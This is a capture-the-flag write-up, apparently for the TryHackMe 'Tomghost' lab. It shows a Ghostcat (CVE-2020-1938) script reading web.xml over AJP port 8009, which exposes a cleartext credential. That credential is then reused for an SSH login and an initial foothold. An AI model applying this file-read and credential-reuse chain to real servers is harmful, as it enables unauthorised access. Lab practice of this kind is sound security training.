CVE-2020-1938
The target AJP endpoint on port 8009 appears to be vulnerable to [[Tomghost_CVE-2020-1938#[CVE-2020-1938](https //nvd.nist.gov/vuln/detail/cve-2020-1938)|CVE-2020-1938]], better known as “Ghostcat”: an unauthenticated AJP client can read any file under the web application root, including WEB-INF/web.xml.
┌──(kali㉿kali)-[~/archive/thm/tomghost]
└─$ python2 CVE-2020-1938.py 10.10.81.214
Getting resource at ajp13://10.10.81.214:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>
</web-app>
Executing the exploit script retrieved the content of the WEB-INF/web.xml file, which contains a cleartext credential in its <description> element: skyfuck:8730281lkjlkjdqlksalks
Because the Tomcat instance restricts its sensitive endpoints (manager, host-manager) to the localhost address, the credential cannot be tested against Tomcat from the attacker's side; it may instead be a system credential, which makes SSH the next thing to try.
SSH
┌──(kali㉿kali)-[~/archive/thm/tomghost]
└─$ ssh skyfuck@$IP
The authenticity of host '10.10.198.73 (10.10.198.73)' can't be established.
ED25519 key fingerprint is SHA256:tWlLnZPnvRHCM9xwpxygZKxaf0vJ8/J64v9ApP8dCDo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.198.73' (ED25519) to the list of known hosts.
skyfuck@10.10.198.73's password: 8730281lkjlkjdqlksalks
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
skyfuck@ubuntu:~$ whoami
skyfuck
skyfuck@ubuntu:~$ hostname
ubuntu
skyfuck@ubuntu:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:e6:f7:17:b3:d5 brd ff:ff:ff:ff:ff:ff
inet 10.10.198.73/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::e6:f7ff:fe17:b3d5/64 scope link
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the skyfuck user by exploiting [[Tomghost_CVE-2020-1938#[CVE-2020-1938](https //nvd.nist.gov/vuln/detail/cve-2020-1938)|CVE-2020-1938]] (“Ghostcat”): the AJP file read exposed a cleartext password in web.xml, and that password was reused for the SSH account.